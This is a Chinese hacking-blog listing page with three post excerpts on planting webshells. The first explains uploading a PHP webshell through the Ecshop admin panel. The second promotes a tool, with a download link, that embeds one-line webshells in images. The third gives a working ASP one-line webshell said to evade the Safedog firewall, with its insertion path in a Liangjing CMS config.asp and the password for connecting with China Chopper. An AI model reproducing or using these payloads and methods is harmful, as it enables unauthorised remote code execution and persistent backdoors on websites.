• Ecshop后台拿shell方法总结(版本自测)

    方法一、 进后台-订单管理-订单打印-选择插入/编辑图片,然后弹出一个对话框,选择链接菜单-浏览服务器,左上角上传类型选择media,然后就可以直接上传php小马。文件路径是:/images/upload/Media/xx.php 方法二、 后台-订单管理-订单打印-选择源代码编辑-在最后面插入代码-保存-返回订单列表,随意选择一个订单打印,返回OK,生成一句话成功-在根目录生成了一个null.php,...阅读全文
    作者:qxz_xp | 发布:2014年8月30日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
  • edjpgcom图片插入一句话工具

    edjpgcom是一个很精巧强悍的小工具!   主要功能是能在图片里插入一句话马或者小马,伪造的比较好。 edjpgcom使用方法: 打开edjpgcom.exe所在文件夹,然后把你所要修改的图片拖动到edjpgcom.exe上面,然后edjpgcom.exe会自动打开,写入想要些的代码即可。 如:下图写入一句话马。 下面是图片插入一句话后的截图: 下载地址:http://pan.baidu.com/s/1pG2JI 阅读全文
    作者:qxz_xp | 发布:2013年12月02日 | 分类:黑客工具, 黑客攻防 | 3条评论
  • 良精南方数据后台插一句话拿shell方法

    良精后台网站配置插入过安全狗的一句话:”%><%Y=request(“hacker”)%> <%execute(Y)%><%’ 这一句话木马是过安全狗的有没有安全狗都能用,但在你不知道网站有没有安全狗的情况下最好就用这个,不然插入普通一句话后config.asp文件就被狗杀掉了,然后网站就挂了。 一句话木马位置:www.xxx.com/inc/config.asp,密码hacker,用中国菜刀...阅读全文
    作者:qxz_xp | 发布:2013年9月27日 | 分类:黑客技术, 黑客攻防 | 暂无评论